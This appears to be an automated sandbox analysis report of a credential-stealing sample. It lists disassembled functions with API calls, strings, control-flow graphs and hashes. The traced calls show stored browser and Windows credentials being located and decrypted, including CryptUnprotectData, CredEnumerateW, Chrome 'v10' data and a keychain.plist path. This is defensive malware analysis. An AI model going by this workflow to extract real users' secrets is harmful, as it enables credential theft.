                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                  • String ID: AE$BIN
                                                                                                                  • API String ID: 1668488027-3931574542
                                                                                                                  • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                  • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                  Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 767404330-0
                                                                                                                  • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                  • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1690352074-0
                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3558857096-0
                                                                                                                  • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                  • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                  Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                  • memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 00407082
                                                                                                                    • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037443186-0
                                                                                                                  • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                  • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                  • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                  • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                  • API String ID: 1963886904-3798722523
                                                                                                                  • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                  • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                  • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                  • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                  • String ID: chp$v10
                                                                                                                  • API String ID: 1297422669-2783969131
                                                                                                                  • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                  • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E3EC
                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E407
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E422
                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                  • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                  • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
